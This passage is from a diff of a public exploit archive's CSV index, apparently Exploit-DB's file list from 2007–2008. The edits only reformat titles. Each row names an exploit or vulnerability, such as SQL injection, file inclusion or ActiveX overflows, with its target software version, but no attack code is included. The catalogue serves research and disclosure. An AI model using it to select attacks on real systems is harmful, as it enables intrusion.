SaveToFile() Exploit",2007-07-06,shinnai,windows,remote,0 4156,platforms/php/webapps/4156.txt,"limesurvey (phpsurveyor) 1.49rc2 - Remote File Inclusion Vulnerability",2007-07-06,"Yakir Wizman",php,webapps,0 4157,platforms/windows/remote/4157.cpp,"SAP DB 7.4 WebTools Remote SEH overwrite Exploit",2007-07-07,Heretic2,windows,remote,9999 -4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 ActiveX TraceTarget() Remote BoF Exploit",2007-07-07,nitr0us,windows,remote,0 +4158,platforms/windows/remote/4158.html,"NeoTracePro 3.25 - ActiveX TraceTarget() Remote BoF Exploit",2007-07-07,nitr0us,windows,remote,0 4159,platforms/php/webapps/4159.txt,"GameSiteScript <= 3.1 (profile id) Remote SQL Injection Vulnerability",2007-07-07,Xenduer77,php,webapps,0 4160,platforms/windows/remote/4160.html,"Chilkat Zip ActiveX Component 12.4 - Multiple Insecure Methods Exploit",2007-07-07,shinnai,windows,remote,0 4161,platforms/php/webapps/4161.txt,"FlashGameScript <= 1.7 (user) Remote SQL Injection Vulnerability",2007-07-08,Xenduer77,php,webapps,0 @@ -3870,21 +3870,21 @@ id,file,description,date,author,platform,type,port 4223,platforms/windows/remote/4223.pl,"IPSwitch IMail Server 2006 - SEARCH Remote Stack Overflow Exploit",2007-07-25,ZhenHan.Liu,windows,remote,143 4224,platforms/php/webapps/4224.txt,"Webyapar 2.0 - Multiple Remote SQL Injection Vulnerabilities",2007-07-25,bypass,php,webapps,0 4225,platforms/php/webapps/4225.txt,"IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vulnerability",2007-07-25,xssvgamer,php,webapps,0 -4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0 +4226,platforms/windows/remote/4226.html,"Clever Internet ActiveX Suite 6.2 - Arbitrary File Download/Overwrite",2007-07-25,shinnai,windows,remote,0 4227,platforms/windows/dos/4227.php,"PHP php_gd2.dll imagepsloadfont Local Buffer Overflow PoC",2007-07-26,r0ut3r,windows,dos,0 4228,platforms/windows/remote/4228.pl,"IPSwitch IMail Server 2006 9.10 SUBSCRIBE Remote Overflow Exploit",2007-07-26,ZhenHan.Liu,windows,remote,143 4229,platforms/windows/local/4229.pl,"CrystalPlayer 1.98 - (.mls) Local Buffer Overflow Exploit",2007-07-26,"Arham Muhammad",windows,local,0 -4230,platforms/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 ActiveX Remote Delete File Exploit",2007-07-26,h07,windows,remote,0 +4230,platforms/windows/remote/4230.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Remote Delete File Exploit",2007-07-26,h07,windows,remote,0 4231,platforms/aix/local/4231.c,"IBM AIX <= 5.3 sp6 capture Terminal Sequence Local Root Exploit",2007-07-27,qaaz,aix,local,0 4232,platforms/aix/local/4232.sh,"IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit",2007-07-27,qaaz,aix,local,0 4233,platforms/aix/local/4233.c,"IBM AIX <= 5.3 sp6 ftp gets() Local Root Exploit",2007-07-27,qaaz,aix,local,0 4234,platforms/windows/remote/4234.html,"mlsrvx.dll 1.8.9.1 ArGoSoft Mail Server Data Write/Code Execution",2007-07-27,callAX,windows,remote,0 4235,platforms/php/webapps/4235.txt,"Seditio CMS <= 121 - (pfs.php) Remote File Upload Vulnerability",2007-07-27,A.D.T,php,webapps,0 4236,platforms/windows/local/4236.php,"PHP 5.x (Win32service) Local Safe Mode Bypass Exploit",2007-07-27,NetJackal,windows,local,0 -4237,platforms/windows/remote/4237.html,"Nessus Vulnerability Scanner 3.0.6 ActiveX Command Exec Exploit",2007-07-27,h07,windows,remote,0 +4237,platforms/windows/remote/4237.html,"Nessus Vulnerability Scanner 3.0.6 - ActiveX Command Exec Exploit",2007-07-27,h07,windows,remote,0 4238,platforms/php/webapps/4238.txt,"Adult Directory (cat_id) Remote SQL Injection Vulnerability",2007-07-27,t0pP8uZz,php,webapps,0 4239,platforms/asp/webapps/4239.txt,"SimpleBlog 3.0 (comments_get.asp id) Remote SQL Injection Vulnerability",2007-07-28,g00ns,asp,webapps,0 -4240,platforms/windows/remote/4240.html,"VMware IntraProcessLogging.dll 5.5.3.42958 Arbitrary Data Write Exploit",2007-07-28,callAX,windows,remote,0 +4240,platforms/windows/remote/4240.html,"VMware IntraProcessLogging.dll 5.5.3.42958 - Arbitrary Data Write Exploit",2007-07-28,callAX,windows,remote,0 4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln",2007-07-28,t0pP8uZz,php,webapps,0 4242,platforms/php/webapps/4242.php,"LinPHA <= 1.3.1 (new_images.php) Remote Blind SQL Injection Exploit",2007-07-29,EgiX,php,webapps,0 4243,platforms/linux/remote/4243.c,"corehttp 0.5.3alpha (httpd) Remote Buffer Overflow Exploit",2007-07-29,vade79,linux,remote,80 @@ -3937,7 +3937,7 @@ id,file,description,date,author,platform,type,port 4290,platforms/windows/remote/4290.html,"EDraw Office Viewer Component 5.1 HttpDownloadFile() Insecure Method",2007-08-16,shinnai,windows,remote,0 4291,platforms/php/webapps/4291.txt,"GetMyOwnArcade (search.php query) Remote SQL Injection Vulnerability",2007-08-16,RoXur777,php,webapps,0 4292,platforms/windows/remote/4292.cpp,"Diskeeper 9 - Remote Memory Disclosure Exploit",2007-08-17,Pravus,windows,remote,0 -4293,platforms/windows/dos/4293.php,"PHP <= 5.2.0 (php_Win32sti) Local Buffer Overflow PoC (Win32)",2007-08-18,boecke,windows,dos,0 +4293,platforms/windows/dos/4293.php,"PHP <= 5.2.0 - (php_win32sti) Local Buffer Overflow PoC (Win32)",2007-08-18,boecke,windows,dos,0 4294,platforms/windows/dos/4294.pl,"Mercury SMTPD Remote Preauth Stack Based Overrun PoC",2007-08-18,eliteboy,windows,dos,0 4295,platforms/php/webapps/4295.txt,"Squirrelcart <= 1.x.x - (cart.php) Remote File Inclusion Vulnerability",2007-08-19,ShaiMagal,php,webapps,0 4296,platforms/php/webapps/4296.txt,"Mambo Component SimpleFAQ 2.11 - Remote SQL Injection Vulnerability",2007-08-20,k1tk4t,php,webapps,0 @@ -3946,8 +3946,8 @@ id,file,description,date,author,platform,type,port 4299,platforms/windows/remote/4299.html,"eCentrex VOIP Client module (uacomx.ocx 2.0.1) Remote BoF Exploit",2007-08-21,rgod,windows,remote,0 4300,platforms/php/webapps/4300.txt,"litecommerce 2004 (category_id) Remote SQL Injection Vulnerability",2007-08-21,k1tk4t,php,webapps,0 4301,platforms/windows/remote/4301.cpp,"Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Overflow Exploit",2007-08-22,ZhenHan.Liu,windows,remote,25 -4302,platforms/windows/local/4302.php,"PHP <= 5.2.3 (php_Win32sti) Local Buffer Overflow Exploit",2007-08-22,Inphex,windows,local,0 -4303,platforms/windows/local/4303.php,"PHP <= 5.2.3 (php_Win32sti) Local Buffer Overflow Exploit (2)",2007-08-22,NetJackal,windows,local,0 +4302,platforms/windows/local/4302.php,"PHP <= 5.2.3 - (php_win32sti) Local Buffer Overflow Exploit",2007-08-22,Inphex,windows,local,0 +4303,platforms/windows/local/4303.php,"PHP <= 5.2.3 - (php_win32sti) Local Buffer Overflow Exploit (2)",2007-08-22,NetJackal,windows,local,0 4304,platforms/windows/dos/4304.php,"PHP 5.2.3 php_ntuser ntuser_getuserlist() Local Buffer Overflow PoC",2007-08-23,shinnai,windows,dos,0 4305,platforms/php/webapps/4305.txt,"Joomla Component NeoRecruit <= 1.4 (id) SQL Injection Vulnerability",2007-08-23,ajann,php,webapps,0 4306,platforms/php/webapps/4306.txt,"Mambo Component RemoSitory (cat) Remote SQL Injection Vulnerability",2007-08-23,ajann,php,webapps,0 @@ -3992,7 +3992,7 @@ id,file,description,date,author,platform,type,port 4345,platforms/windows/local/4345.c,"Norman Virus Control nvcoaft51.sys ioctl BF672028 Exploit",2007-08-30,inocraM,windows,local,0 4346,platforms/php/webapps/4346.pl,"phpBB Links MOD 1.2.2 - Remote SQL Injection Exploit",2007-08-31,Don,php,webapps,0 4347,platforms/linux/dos/4347.pl,"Wireshark < 0.99.5 DNP3 Dissector Infinite Loop Exploit",2007-08-31,"Beyond Security",linux,dos,0 -4348,platforms/windows/remote/4348.c,"PPStream (PowerPlayer.dll 2.0.1.3829) Activex Remote Overflow Exploit",2007-08-31,dummy,windows,remote,0 +4348,platforms/windows/remote/4348.c,"PPStream (PowerPlayer.dll 2.0.1.3829) ActiveX Remote Overflow Exploit",2007-08-31,dummy,windows,remote,0 4349,platforms/php/webapps/4349.pl,"CKGold Shopping Cart 2.0 (category.php) Blind SQL Injection Exploit",2007-08-31,k1tk4t,php,webapps,0 4350,platforms/php/webapps/4350.php,"Joomla! 1.5 Beta1/Beta2/RC1 - Remote SQL Injection Exploit",2007-09-01,Silentz,php,webapps,0 4351,platforms/windows/remote/4351.html,"Yahoo! Messenger (YVerInfo.dll <= 2007.8.27.1) ActiveX BoF Exploit",2007-09-01,minhbq,windows,remote,0 @@ -4017,9 +4017,9 @@ id,file,description,date,author,platform,type,port 4370,platforms/php/webapps/4370.txt,"Webace-Linkscript 1.3 SE (start.php) Remote SQL Injection Vulnerability",2007-09-07,k1tk4t,php,webapps,0 4371,platforms/php/webapps/4371.txt,"RW::Download 2.0.3 lite (index.php dlid) Remote SQL Injection Vuln",2007-09-07,k1tk4t,php,webapps,0 4372,platforms/windows/remote/4372.html,"GlobalLink 2.7.0.8 glitemflat.dll SetClientInfo() Heap Overflow Exploit",2007-09-07,void,windows,remote,0 -4373,platforms/windows/dos/4373.html,"EDraw Office Viewer Component 5.2 ActiveX Remote BoF PoC",2007-09-07,shinnai,windows,dos,0 +4373,platforms/windows/dos/4373.html,"EDraw Office Viewer Component 5.2 - ActiveX Remote BoF PoC",2007-09-07,shinnai,windows,dos,0 4374,platforms/php/webapps/4374.txt,"Online Fantasy Football League (OFFL) 0.2.6 RFI Vulnerabilities",2007-09-07,MhZ91,php,webapps,0 -4375,platforms/windows/dos/4375.txt,"BaoFeng2 Mps.dll Activex Multiple Remote Buffer Overflow PoCs",2007-09-08,ZhenHan.Liu,windows,dos,0 +4375,platforms/windows/dos/4375.txt,"BaoFeng2 Mps.dll ActiveX Multiple Remote Buffer Overflow PoCs",2007-09-08,ZhenHan.Liu,windows,dos,0 4376,platforms/php/webapps/4376.txt,"TLM CMS 3.2 - Multiple Remote SQL Injection Vulnerabilities",2007-09-08,k1tk4t,php,webapps,0 4377,platforms/php/webapps/4377.txt,"Focus/SIS <= 1.0/2.2 - Remote File Inclusion Vulnerabilities",2007-09-08,"ThE TiGeR",php,webapps,0 4378,platforms/php/webapps/4378.htm,"fuzzylime CMS <= 3.0 - Local File Inclusion Vulnerability",2007-09-08,"not sec group",php,webapps,0 @@ -4070,7 +4070,7 @@ id,file,description,date,author,platform,type,port 4424,platforms/windows/remote/4424.html,"Apple Quicktime /w IE .qtl Version XAS - Remote Exploit PoC",2007-09-18,"Aviv Raff",windows,remote,0 4425,platforms/php/webapps/4425.pl,"phpBB Mod Ktauber.com StylesDemo Blind SQL Injection Exploit",2007-09-18,nexen,php,webapps,0 4426,platforms/hardware/dos/4426.pl,"Airsensor M520 HTTPD Remote Preauth DoS / BoF PoC",2007-09-18,"Alex Hernandez",hardware,dos,0 -4427,platforms/windows/remote/4427.html,"jetAudio 7.x ActiveX DownloadFromMusicStore() Code Execution Exploit",2007-09-19,h07,windows,remote,0 +4427,platforms/windows/remote/4427.html,"jetAudio 7.x - ActiveX DownloadFromMusicStore() Code Execution Exploit",2007-09-19,h07,windows,remote,0 4428,platforms/windows/remote/4428.html,"Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download",2007-09-19,shinnai,windows,remote,0 4429,platforms/windows/remote/4429.pl,"Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit",2007-09-19,void,windows,remote,143 4430,platforms/php/webapps/4430.txt,"Streamline PHP Media Server 1.0-beta4 RFI Vulnerability",2007-09-19,BiNgZa,php,webapps,0 @@ -4095,7 +4095,7 @@ id,file,description,date,author,platform,type,port 4449,platforms/php/webapps/4449.txt,"phpFullAnnu (PFA) 6.0 - Remote SQL Injection Vulnerability",2007-09-23,IHTeam,php,webapps,0 4450,platforms/windows/remote/4450.py,"Xitami Web Server 2.5 (If-Modified-Since) Remote BoF Exploit (0day)",2007-09-24,h07,windows,remote,80 4451,platforms/php/webapps/4451.txt,"DFD Cart 1.1 - Multiple Remote File Inclusion Vulnerabilities",2007-09-24,BiNgZa,php,webapps,0 -4452,platforms/windows/remote/4452.html,"AskJeeves Toolbar 4.0.2.53 activex Remote Buffer Overflow Exploit",2007-09-24,"Joey Mengele",windows,remote,0 +4452,platforms/windows/remote/4452.html,"AskJeeves Toolbar 4.0.2.53 - ActiveX Remote Buffer Overflow Exploit",2007-09-24,"Joey Mengele",windows,remote,0 4453,platforms/windows/remote/4453.html,"EB Design Pty Ltd (EBCRYPT.DLL 2.0) Multiple Remote Vulnerabilites",2007-09-24,shinnai,windows,remote,0 4454,platforms/php/webapps/4454.txt,"sk.log <= 0.5.3 (skin_url) Remote File Inclusion Vulnerability",2007-09-24,w0cker,php,webapps,0 4455,platforms/windows/remote/4455.pl,"Motorola Timbuktu Pro <= 8.6.5 File Deletion/Creation Exploit",2008-03-11,titon,windows,remote,0 @@ -4149,7 +4149,7 @@ id,file,description,date,author,platform,type,port 4503,platforms/php/webapps/4503.txt,"LiveAlbum 0.9.0 common.php Remote File Inclusion Vulnerability",2007-10-08,S.W.A.T.,php,webapps,0 4504,platforms/php/webapps/4504.txt,"Softbiz Jobs & Recruitment Remote SQL Injection Vulnerability",2007-10-08,IRCRASH,php,webapps,0 4505,platforms/php/webapps/4505.php,"LightBlog 8.4.1.1 - Remote Code Execution Exploit",2007-10-09,BlackHawk,php,webapps,0 -4506,platforms/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution",2007-10-09,shinnai,windows,remote,0 +4506,platforms/windows/remote/4506.html,"Microsoft Visual FoxPro 6.0 - FPOLE.OCX Arbitrary Command Execution",2007-10-09,shinnai,windows,remote,0 4507,platforms/php/webapps/4507.txt,"joomla component mp3 allopass 1.0 - Remote File Inclusion Vulnerability",2007-10-10,NoGe,php,webapps,0 4508,platforms/php/webapps/4508.txt,"Joomla Component JContentSubscription 1.5.8 - Multiple RFI Vulns",2007-10-10,NoGe,php,webapps,0 4509,platforms/php/webapps/4509.txt,"TikiWiki 1.9.8 - Remote PHP Injection Vulnerability",2007-10-10,ShAnKaR,php,webapps,0 @@ -4169,7 +4169,7 @@ id,file,description,date,author,platform,type,port 4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Newsletter Module Remote SQL Injection Exploit",2007-10-11,s4mi,php,webapps,0 4524,platforms/php/webapps/4524.txt,"joomla component com_colorlab 1.0 - Remote File Inclusion Vulnerability",2007-10-12,"Mehmet Ince",php,webapps,0 4525,platforms/php/webapps/4525.pl,"TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0 -4526,platforms/windows/remote/4526.html,"PBEmail 7 ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0 +4526,platforms/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0 4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script Remote SQL Injection Vulnerability",2007-10-13,IRCRASH,php,webapps,0 4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module Remote SQL Injection Vulnerability",2007-10-13,"Mehmet Ince",php,webapps,0 4529,platforms/cgi/webapps/4529.txt,"WWWISIS <= 7.1 (IsisScript) Local File Disclosure / XSS Vulnerabilities",2007-10-13,JosS,cgi,webapps,0 @@ -4305,7 +4305,7 @@ id,file,description,date,author,platform,type,port 4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - Remote SQL Injection Exploit",2007-11-25,IRCRASH,php,webapps,0 4661,platforms/php/webapps/4661.py,"DeluxeBB <= 1.09 - Remote Admin Email Change Exploit",2007-11-26,nexen,php,webapps,0 4662,platforms/php/webapps/4662.txt,"Tilde CMS <= 4.x - (aarstal) Remote SQL Injection Vulnerability",2007-11-26,KiNgOfThEwOrLd,php,webapps,0 -4663,platforms/windows/remote/4663.html,"BitDefender Online Scanner 8 ActiveX Heap Overflow Exploit",2007-11-27,Nphinity,windows,remote,0 +4663,platforms/windows/remote/4663.html,"BitDefender Online Scanner 8 - ActiveX Heap Overflow Exploit",2007-11-27,Nphinity,windows,remote,0 4664,platforms/windows/remote/4664.txt,"Apple QuickTime 7.2/7.3 RSTP Response Universal Exploit (cool)",2007-11-27,"YAG KOHHA",windows,remote,0 4665,platforms/php/webapps/4665.txt,"Eurologon CMS - Multiple Remote SQL Injection Vulnerabilities",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 4666,platforms/php/webapps/4666.txt,"Eurologon CMS files.php Arbitrary File Download Vulnerability",2007-11-27,KiNgOfThEwOrLd,php,webapps,0 @@ -4442,7 +4442,7 @@ id,file,description,date,author,platform,type,port 4798,platforms/php/webapps/4798.php,"ZeusCMS <= 0.3 - Remote Blind SQL Injection Exploit",2007-12-27,EgiX,php,webapps,0 4799,platforms/php/webapps/4799.txt,"Joovili <= 3.0.6 (joovili.images.php) Remote File Disclosure Vulnerability",2007-12-27,EcHoLL,php,webapps,0 4800,platforms/php/webapps/4800.txt,"xml2owl 0.1.1 showCode.php Remote Command Execution Vulnerability",2007-12-28,MhZ91,php,webapps,0 -4801,platforms/windows/dos/4801.html,"SkyFex Client 1.0 ActiveX Start() Method Remote Stack Overflow",2007-12-28,shinnai,windows,dos,0 +4801,platforms/windows/dos/4801.html,"SkyFex Client 1.0 - ActiveX Start() Method Remote Stack Overflow",2007-12-28,shinnai,windows,dos,0 4802,platforms/php/webapps/4802.txt,"XCMS <= 1.82 - Remote Local File Inclusion Vulnerability",2007-12-28,nexen,php,webapps,0 4804,platforms/php/webapps/4804.txt,"Hot or Not Clone by Jnshosts.com Database Backup Dump Vulnerability",2007-12-28,RoMaNcYxHaCkEr,php,webapps,0 4805,platforms/php/webapps/4805.txt,"NoseRub <= 0.5.2 Login SQL Injection Vulnerability",2007-12-28,"Felix Groebert",php,webapps,0 @@ -4469,7 +4469,7 @@ id,file,description,date,author,platform,type,port 4826,platforms/php/webapps/4826.pl,"WebPortal CMS <= 0.6.0 (index.php m) Remote SQL Injection Exploit",2007-12-31,x0kster,php,webapps,0 4827,platforms/php/webapps/4827.txt,"Joomla Component PU Arcade <= 2.1.3 - SQL Injection Vulnerability",2007-12-31,Houssamix,php,webapps,0 4828,platforms/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 download2.php File Disclosure Vulnerability",2008-01-01,GoLd_M,php,webapps,0 -4829,platforms/windows/dos/4829.html,"DivX Player 6.6.0 ActiveX SetPassword() Denial of Service PoC",2008-01-02,N/A,windows,dos,0 +4829,platforms/windows/dos/4829.html,"DivX Player 6.6.0 - ActiveX SetPassword() Denial of Service PoC",2008-01-02,N/A,windows,dos,0 4830,platforms/php/webapps/4830.txt,"ClipShare (uprofile.php UID) Remote SQL Injection Vulnerability",2008-01-02,Krit,php,webapps,0 4831,platforms/php/webapps/4831.txt,"MyPHP Forum <= 3.0 (Final) Remote SQL Injection Vulnerability",2008-01-03,The:Paradox,php,webapps,0 4832,platforms/php/webapps/4832.php,"Site@School <= 2.4.10 - Remote Blind SQL Injection Exploit",2008-01-03,EgiX,php,webapps,0 @@ -4580,7 +4580,7 @@ id,file,description,date,author,platform,type,port 4938,platforms/windows/local/4938.py,"Microsoft Visual Basic Enterprise Ed. 6 SP6 - (.dsr) File Handling BoF Exploit",2008-01-18,shinnai,windows,local,0 4939,platforms/php/webapps/4939.txt,"Wordpress plugin WP-Forum 1.7.4 - Remote SQL Injection Vulnerability",2008-01-19,"websec Team",php,webapps,0 4940,platforms/php/webapps/4940.pl,"Mini File Host 1.2.1 (upload.php language) Local File Inclusion Exploit",2008-01-20,shinmai,php,webapps,0 -4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 Auth Bypass Vulnerability",2008-01-20,DarkFig,hardware,remote,0 +4941,platforms/hardware/remote/4941.txt,"Belkin Wireless G Plus MIMO Router F5D9230-4 - Auth Bypass Vulnerability",2008-01-20,DarkFig,hardware,remote,0 4942,platforms/php/webapps/4942.txt,"TikiWiki < 1.9.9 tiki-listmovies.php Directory Traversal Vulnerability",2008-01-20,Sha0,php,webapps,0 4943,platforms/php/webapps/4943.txt,"Frimousse 0.0.2 explorerdir.php Local Directory Traversal Vulnerability",2008-01-20,Houssamix,php,webapps,0 4944,platforms/php/webapps/4944.txt,"360 Web Manager 3.0 (IDFM) SQL Injection Vulnerability",2008-01-20,"Ded MustD!e",php,webapps,0 @@ -4741,7 +4741,7 @@ id,file,description,date,author,platform,type,port 5103,platforms/php/webapps/5103.txt,"Joomla Component rapidrecipe <= 1.6.5 - SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 5104,platforms/php/webapps/5104.txt,"Joomla Component pcchess <= 0.8 - Remote SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0 5105,platforms/php/webapps/5105.pl,"AuraCMS 2.2 (gallery_data.php) Remote SQL Injection Exploit",2008-02-12,DNX,php,webapps,0 -5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - WFICA.OCX ActiveX - Heap BoF Exploit",2008-02-12,Elazar,windows,remote,0 +5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - WFICA.OCX ActiveX Heap BoF Exploit",2008-02-12,Elazar,windows,remote,0 5107,platforms/windows/local/5107.c,"Microsoft Office 2003 - (.wps) Stack Overflow Exploit (MS08-011)",2008-02-13,chujwamwdupe,windows,local,0 5108,platforms/php/webapps/5108.txt,"Affiliate Market 0.1 BETA - (language) Local File Inclusion Vulnerability",2008-02-13,GoLd_M,php,webapps,0 5109,platforms/php/webapps/5109.txt,"Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability",2008-02-13,S@BUN,php,webapps,0 @@ -4852,7 +4852,7 @@ id,file,description,date,author,platform,type,port 5214,platforms/php/webapps/5214.txt,"Mitra Informatika Solusindo cart Remote SQL Injection Vulnerability",2008-03-04,bius,php,webapps,0 5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6 (Webrick Httpd 1.3.1) Directory Traversal Vulnerability",2008-03-06,DSecRG,multiple,remote,0 5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerability",2008-03-06,S@BUN,php,webapps,0 -5217,platforms/windows/dos/5217.html,"ICQ Toolbar 2.3 ActiveX Remote Denial of Service Exploit",2008-03-06,spdr,windows,dos,0 +5217,platforms/windows/dos/5217.html,"ICQ Toolbar 2.3 - ActiveX Remote Denial of Service Exploit",2008-03-06,spdr,windows,dos,0 5218,platforms/php/webapps/5218.txt,"XOOPS Module wfdownloads (cid) Remote SQL Injection Vulnerability",2008-03-06,S@BUN,php,webapps,0 5219,platforms/php/webapps/5219.php,"zKup CMS 2.0 <= 2.3 - Remote Add Admin Exploit",2008-03-07,"Charles Fol",php,webapps,0 5220,platforms/php/webapps/5220.php,"zKup CMS 2.0 <= 2.3 - Remote Upload Exploit",2008-03-07,"Charles Fol",php,webapps,0 @@ -4898,7 +4898,7 @@ id,file,description,date,author,platform,type,port 5261,platforms/windows/dos/5261.py,"Rosoft Media Player 4.1.8 RML Stack Based Buffer Overflow PoC",2008-03-15,"Wiktor Sierocinski",windows,dos,0 5262,platforms/php/webapps/5262.txt,"mutiple timesheets <= 5.0 - Multiple Vulnerabilities",2008-03-16,JosS,php,webapps,0 5263,platforms/php/webapps/5263.txt,"phpBP <= RC3 (2.204) FIX4 - Remote SQL Injection Vulnerability",2008-03-16,irk4z,php,webapps,0 -5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 ActiveX Remote BoF Exploit",2008-03-16,h07,windows,remote,0 +5264,platforms/windows/remote/5264.html,"CA BrightStor ARCserve Backup r11.5 - ActiveX Remote BoF Exploit",2008-03-16,h07,windows,remote,0 5265,platforms/php/webapps/5265.txt,"Exero CMS 1.0.1 (theme) Multiple Local File Inclusion Vulnerabilities",2008-03-17,GoLd_M,php,webapps,0 5266,platforms/php/webapps/5266.txt,"PHPauction GPL Enhanced 2.51 - Multiple RFI Vulnerabilities",2008-03-17,RoMaNcYxHaCkEr,php,webapps,0 5267,platforms/php/webapps/5267.txt,"XOOPS Module Dictionary <= 0.94 - Remote SQL Injection Vulnerability",2008-03-17,S@BUN,php,webapps,0 @@ -4929,17 +4929,17 @@ id,file,description,date,author,platform,type,port 5295,platforms/php/webapps/5295.pl,"PHP-Nuke Platinum 7.6.b.5 (dynamic_titles.php) SQL Injection Exploit",2008-03-22,Inphex,php,webapps,0 5296,platforms/php/webapps/5296.txt,"Cuteflow Bin 1.5.0 (login.php) Local File Inclusion Vulnerability",2008-03-22,KnocKout,php,webapps,0 5297,platforms/php/webapps/5297.txt,"Joomla Component rekry 1.0.0 (op_id) SQL Injection Vulnerability",2008-03-23,Sniper456,php,webapps,0 -5298,platforms/php/webapps/5298.py,"destar 0.2.2-5 Arbitrary Add New User Exploit",2008-03-23,nonroot,php,webapps,0 +5298,platforms/php/webapps/5298.py,"destar 0.2.2-5 - Arbitrary Add New User Exploit",2008-03-23,nonroot,php,webapps,0 5299,platforms/php/webapps/5299.txt,"Joomla Component d3000 1.0.0 - Remote SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0 5300,platforms/php/webapps/5300.txt,"Joomla Component Cinema 1.0 - Remote SQL Injection Vulnerability",2008-03-23,S@BUN,php,webapps,0 5301,platforms/php/webapps/5301.txt,"phpBB Module XS-Mod 2.3.1 - Local File Inclusion Vulnerability",2008-03-24,bd0rk,php,webapps,0 5302,platforms/php/webapps/5302.txt,"PowerBook 1.21 (index.php page) Local File Inclusion Vulnerability",2008-03-24,DSecRG,php,webapps,0 5303,platforms/php/webapps/5303.txt,"PowerPHPBoard 1.00b - Multiple Local File Inclusion Vulnerabilities",2008-03-24,DSecRG,php,webapps,0 5304,platforms/cgi/webapps/5304.txt,"HIS-Webshop (his-webshop.pl t) Remote File Disclosure Vulnerability",2008-03-24,"Zero X",cgi,webapps,0 -5305,platforms/php/webapps/5305.py,"destar 0.2.2-5 Arbitrary Add Admin User Exploit",2008-03-24,nonroot,php,webapps,0 +5305,platforms/php/webapps/5305.py,"destar 0.2.2-5 - Arbitrary Add Admin User Exploit",2008-03-24,nonroot,php,webapps,0 5306,platforms/multiple/dos/5306.txt,"snircd <= 1.3.4 (send_user_mode) Denial of Service Vulnerability",2008-03-24,"Chris Porter",multiple,dos,0 5307,platforms/linux/dos/5307.pl,"MPlayer sdpplin_parse() Array Indexing Buffer Overflow Exploit PoC",2008-03-25,"Guido Landi",linux,dos,0 -5308,platforms/php/webapps/5308.txt,"e107 Plugin My_Gallery 2.3 Arbitrary File Download Vulnerability",2008-03-25,"Jerome Athias",php,webapps,0 +5308,platforms/php/webapps/5308.txt,"e107 Plugin My_Gallery 2.3 - Arbitrary File Download Vulnerability",2008-03-25,"Jerome Athias",php,webapps,0 5309,platforms/php/webapps/5309.txt,"BolinOS 4.6.1 - (LFI/XSS) Multiple Security Vulnerabilities",2008-03-25,DSecRG,php,webapps,0 5310,platforms/php/webapps/5310.txt,"Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability",2008-03-25,cO2,php,webapps,0 5311,platforms/php/webapps/5311.txt,"TopperMod 2.0 - Remote SQL Injection Vulnerability",2008-03-25,girex,php,webapps,0 @@ -4969,7 +4969,7 @@ id,file,description,date,author,platform,type,port 5335,platforms/php/webapps/5335.txt,"Mambo Component ahsShop <= 1.51 (vara) SQL Injection Vulnerability",2008-04-01,S@BUN,php,webapps,0 5336,platforms/php/webapps/5336.pl,"eggBlog 4.0 Password Retrieve Remote SQL Injection Exploit",2008-04-01,girex,php,webapps,0 5337,platforms/php/webapps/5337.txt,"Joomla Component actualite 1.0 (id) SQL Injection Vulnerability",2008-04-01,Stack,php,webapps,0 -5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 Arbitrary Files Overwrite Exploit",2008-04-01,shinnai,windows,remote,0 +5338,platforms/windows/remote/5338.html,"ChilkatHttp ActiveX 2.3 - Arbitrary Files Overwrite Exploit",2008-04-01,shinnai,windows,remote,0 5339,platforms/php/webapps/5339.php,"Nuked-Klan <= 1.7.6 - Multiple Vulnerabilities Exploit",2008-04-01,"Charles Fol",php,webapps,0 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - Remote SQL Injection Vulnerability",2008-04-01,DreamTurk,php,webapps,0 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service Exploit",2008-04-01,Ray,windows,dos,0 @@ -5018,8 +5018,8 @@ id,file,description,date,author,platform,type,port 5384,platforms/php/webapps/5384.txt,"Prozilla Top 100 1.2 - Arbitrary Delete Stats Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service (forum.php forum) SQL Injection Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit",2008-04-06,"INetCop Security",linux,remote,80 -5387,platforms/php/webapps/5387.txt,"Prozilla Reviews Script 1.0 Arbitrary 